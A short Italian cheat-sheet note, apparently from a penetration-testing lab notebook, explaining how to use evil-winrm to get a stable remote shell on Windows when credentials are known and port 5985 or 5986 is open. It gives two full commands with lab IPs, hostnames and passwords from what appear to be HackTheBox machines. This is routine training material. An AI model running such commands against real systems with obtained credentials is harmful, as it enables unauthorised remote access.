tags: Evil-WinRM Windows Connessione_Windows WinRM


Nel caso possedessimo le credenziali e la porta 5985 o 5986 fosse aperta il miglior modo per avere una reverse shell stabile è quello di usare questo programma in questo modo:

evil-winrm -i 10.129.37.56 -u Administrator -p 'MEGACORP_4dm1n!!'

Se non funziona prova ad aggiungere il dominio:

evil-winrm -i cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'